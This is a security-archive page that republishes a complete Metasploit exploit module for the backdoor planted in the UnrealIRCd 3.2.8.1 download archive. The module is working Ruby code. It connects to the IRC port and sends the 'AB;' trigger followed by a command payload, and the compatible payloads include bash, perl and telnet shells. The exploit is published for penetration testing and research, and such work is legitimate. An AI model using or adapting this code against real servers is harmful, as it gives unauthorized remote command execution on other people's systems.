UnrealIRCD 3.2.8.1 Backdoor Command Execution

UnrealIRCD 3.2.8.1 Backdoor Command Execution: Posted Jun 15, 2010; Authored by H D Moore | Site metasploit.com; This Metasploit module uses exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.; tags | exploit; SHA-256 | 52f914f7168fd04b82c913d02b7265643ee5d7402d40a96322c070c6b1569b32; Download | Favorite | View

UnrealIRCD 3.2.8.1 Backdoor Command Execution

##
# $Id: unreal_ircd_3281_backdoor.rb 9510 2010-06-13 12:41:48Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
      'Description'    => %q{
        This module uses exploits a malicious backdoor that was added to the
      Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
      Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9510 $',
      'References'     =>
        [
          [ 'OSVDB', '65445'],
          [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt'],
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby bash telnet',
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget' => 0))

      register_options(
        [
          Opt::RPORT(6667)
        ], self.class)
  end

  def exploit
    connect

    print_status("Connected to #{rhost}:#{rport}...")
    banner = sock.get_once(-1, 30)
    banner.to_s.split("\n").each do |line|
      print_line("    #{line}")
    end

    print_status("Sending backdoor command...")
    sock.put("AB;" + payload.encoded + "\n")

    handler
    disconnect
  end
end

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

UnrealIRCD 3.2.8.1 Backdoor Command Execution

UnrealIRCD 3.2.8.1 Backdoor Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

UnrealIRCD 3.2.8.1 Backdoor Command Execution

Share This

UnrealIRCD 3.2.8.1 Backdoor Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems